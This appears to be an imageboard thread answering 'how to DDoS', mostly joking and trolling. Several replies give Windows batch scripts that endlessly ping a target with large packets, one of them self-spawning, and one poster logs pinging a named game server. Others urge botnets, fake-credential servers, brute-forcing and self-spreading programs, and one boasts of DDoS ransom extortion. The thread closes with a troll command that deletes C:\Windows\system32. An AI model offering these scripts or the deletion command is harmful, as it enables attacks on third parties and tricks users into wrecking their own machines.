How to DDos? Asking for a friend

How to DDos? Asking for a friend.

Attached: 1522193386297.jpg (1600x1200, 286K)

open up terminal
ping [the ip you're trying to ddos]
open up another terminal and do the same.
Until you have at least 10,000 terminals open all pinging the same IP.

LOIC

Acquire (how is up to you) access to a high bandwidth server or rent one in a shithole with fake credentials.
Direct its whole bandwidth to bombard a specific IP.

I used to do that over 10 years ago and keep sites and servers in hostage and demand ransom. Mostly sites dealing with gray areas or illegal game servers.
Worked perfectly.

Could I do this to Jow Forums?

Why is it the site owners can’t just block all traffic from either your IP it’s range or that country for the time that you’re doing that?

install gentoo

Install bothert

Acquire alot of internetz
Direct those internetz to ur target(z)
???
Profit?!

Gratz u just pwned the Internet.

Write a shitty program, that will spread itself, and shit your ddos targes.
>pro tips: Windows is better described as colander with holes covered by closed source code, and Linux, GNU have open source code

You can do it to Jow Forums on Pentium MMX, since Jow Forums runs on Mac Minis

They can and they do. Thing is, if you ban the ip-range of a big ISP or even partly block it, your other clients have a hard time accessing your site. this is one of the simplest answers to centralized DDosing. however, things developed and nowadays you want to use some shady chino-africo-russian botnet service which uses internet-of-shit lightbulbs, baby phones, security cams, your gramma's pc and all those other unprotected devices all over the internet to fuck your target.

Well, but services like Google Shield, Amazon Protection and the ISPs do a pretty good job protecting fairly large sites even from that.

Simplest thing to fuck some guy would be to social engineer or simply brute force your way into his system and do it from the inside...

Here's a DDoS script for windows, just save in .txt file and change file extension to .bat:
:pong
ping -t -l 65500 [target location here]
start [what you named this file].bat
goto pong

It will be sending 65500 bytes of data per window, will be using about 10 bytes of data per window open on your computer. So they should start having troubles when you reach 100 or more windows while your compute continues to run smoothly.

Todays hosting services scale up your traffic if you get an overload like that. they'll send you a nice automated message asking you respond if they should reject those icmp request or you take actions yourself. don't be dumb, most of this shit is automated by now.

ok

If you want to be any effective, you have to study amplification attack

C:\Users\####>ping -t -l 6550 play.minesuperior.com

Pinging play.minesuperior.com [158.69.90.222] with 6550 bytes of data:

Ping statistics for 158.69.90.222:
Packets: Sent = 23, Received = 11, Lost = 12 (52% loss),
Approximate round trip times in milli-seconds:
Minimum = 63ms, Maximum = 71ms, Average = 64ms

Just took some random minecraft server and went ahead and pinged with just 6550 bytes of memory on my 60bit laptop, it was 52% loss. Are you sure scaling up is true?
DDOS won't work on big companies with hosting provided by server farms, certainly not, but for lone wolves, single websites, kiddies, this shit seems to be super effective. Am i missing something? (sorry had to cut short because shitty Jow Forums bot thought it was spam.

yea well, couldn't see where it's hosted, it's behind godaddy-whois-protection. but maybe it's just hosted on some guys homeserver or smth, maybe it's just a cheap contract or whatever. like you said, against lone wolves and kiddies it would be effective. i just know that my provider (biggest german hosting provider) and with the cheapest available webhosting package, I get this temporal upscaling and messages and I know that similar companies do the same.

install TempleOS

@echo off
:opisanfaggot
ping Jow Forums.org
goto opisanfaggot

ping Jow Forums.org -t -l 9000

press F5 until the site is no longer reachable

Attached: hackerman.png (1280x720, 1.21M)

DON'T IT, Jow Forums IS RUNNING ON POWERPC MAC MINIS.

give me your sever id right now so i can attempt a ddos with my potatoe.

Also DDOS of this small scale is effective if you can make it spread to every computer which contacts the host.

actually Jow Forums is runnign on NSA servers so un DDOS able, i will give you a gold star if you can successfully DDOS Jow Forums.

Only windows fags ask these questions.

>Open cmd as a administrator
>Type in ''takeown /F C:\Windows\System32''
>Then ''del C:\WINDOWS\system32''